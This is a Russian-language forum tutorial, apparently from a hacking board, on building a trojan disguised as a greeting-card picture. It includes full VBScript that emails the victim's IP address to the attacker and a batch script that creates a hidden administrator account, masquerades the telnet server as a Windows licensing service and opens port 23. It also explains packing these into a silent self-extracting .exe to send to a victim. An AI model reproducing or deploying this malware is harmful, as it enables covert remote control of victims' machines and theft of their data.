Троян не палился не одним из 40 антивирусов.
Сейчас я покажу как написать трояна который будет открывать 23[telnet] и 28137[FTP] порт , будет один файл *.exe , юзер откроет его , а там откроется картинка , не каких лишних окон выходить не будет .
Для начала скачиваем прогу Yoozy
Для создания трояна нужны файлы :
1)YoozyServer.exe - находится в архиве
2)любая картинка с названием 123.jpg
3)mail.vbs - этот файл присылает ip на мыло
4)user.bat - нужно создать ярлык этого файла
Исходник mail.vbs
Const FOF_SIMPLEPROGRESS = 256 Dim MySource, MyTarget, MyHex, MyBinary, i Dim oShell, oCTF Dim oFileSys dim winShell dim newfolderpath dim t On Error Resume Next h = Hour(Now) m = Minute(Now) s = Second(Now) t = date() & "-" & h & "-" & m & "-" & s dim filesys, newfolder newfolderpath = "c:\12345" ' Название временной папки set filesys=CreateObject("sсriрting.FileSystemObject") If Not filesys.FolderExists(newfolderpath) Then Set newfolder = filesys.CreateFolder(newfolderpath) End If set filesys=Nothing Set newfolder=Nothing Set WshShell = CreateObject("Wsсriрt.Shell") WshShell.Run "cmd.exe /c ipconfig > C:\12345\ip.txt", 0, false Wsсriрt.Sleep (5000) Set S = CreateObject("Wsсriрt.Shell") set FSO=createobject("sсriрting.filesystemobject") Call SendPost("smtp.mail.ru","куда придёт айпи","левое мыло с @mail.ru","IP ЛАМЕРА","ИПЫ") Function SendPost(strSMTP_Server,strTo,strFrom,strSubject,s trbоdу) Set iMsg=CreateObject("CDO.Message") Set iConf=CreateObject("CDO.Configuration") Set Flds=iConf.Fields Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing")=2 Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate")=1 Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername")="здесь логин левого мыла без @mail.ru" Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword")="здесь пароль от левого мыла" Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver")="smtp.mail.ru" Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport")=25 Flds.updаtе iMsg.Configuration=iConf iMsg.To=strTo iMsg.From=strFrom iMsg.Subject=strSubject iMsg.Textbоdу=strbоdу iMsg.AddAttachment "C:\12345\ip.txt" iMsg.Send End Function Set iMsg=Nothing Set iConf=Nothing Set Flds=Nothing
Исходник user.bat
@Echo off start C:\mail.vbs start C:\123.jpg chcp 1251 net user SUPPORT_388945a0 /delete net user SUPPORT_388945a0 1 /add net localgroup "Администраторы" SUPPORT_388945a0 /add net localgroup "Пользователи" SUPPORT_388945a0 /del copy /y "%SYSTEMROOT%/system32\tlntsvr.exe" "%SYSTEMROOT%/system32\tlntsevr.exe" ECHO Windows Registry Editor Version 5.00>>user.reg ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t]>>user.reg ECHO "SUPPORT_388945a0"=dword:00000000>>user.reg regedit /s user.reg && DEL user.reg sc create "Microsoft Network" binpath= %windir%\system32\tlntsevr.exe type= own start= auto displayname= "Проверка подлинности Microsoft Windows" error= ignore depend= RPCSS/TCPIP/NTLMSSP sc desсriрtion "Microsoft Network" "Удостоверяет, что ваш компьютер использует лицензионное программное обеспечение." sc config tlntsvr start= auto tlntadmn config port=23 sec=-NTLM net start Telnet start C:\YoozyServer.exe
Этот код создаст юзера с логином :SUPPORT_388945a0 и паролем :и паролем : , для подключения через 23 порт , юзер будет скрыт и не будет отображатся .
Скрины :
Все 4 файла
Winrar
Настройки в winrar'e , нужно выделить всё и щёлкнуть правой кнопкой мыши , и выбрать "Добавить в архив", дадим название файлу Окрытка.exe
После нажимаем "Дополнительно" "Параметры SFX"
После нажимаем на вкладку "Режимы" и ставим галочку на "скрыть всё"
Нажимаем на вкладку "текст и графика" там есть функция "Загрузить значок SFX из файла" скачиваем с инета иконки указываем пуь , после нажимаем "ок" "ок" и у нас должен получится один файл "Открытка.exe"
Пример:
Далее закидываем жертве и ждём ip , после того как ip пришёл Открываем Yoozy.exe (не вздумайте открыть YoozyServer.exe) вводим ip и мы имеем полный доступ к файлам , а чтоб подключится через telnet , заходим Пуск-Выполнить- telnet.exe или зажимаем клавиши windows+r .
Если помог не забываем поблагодарить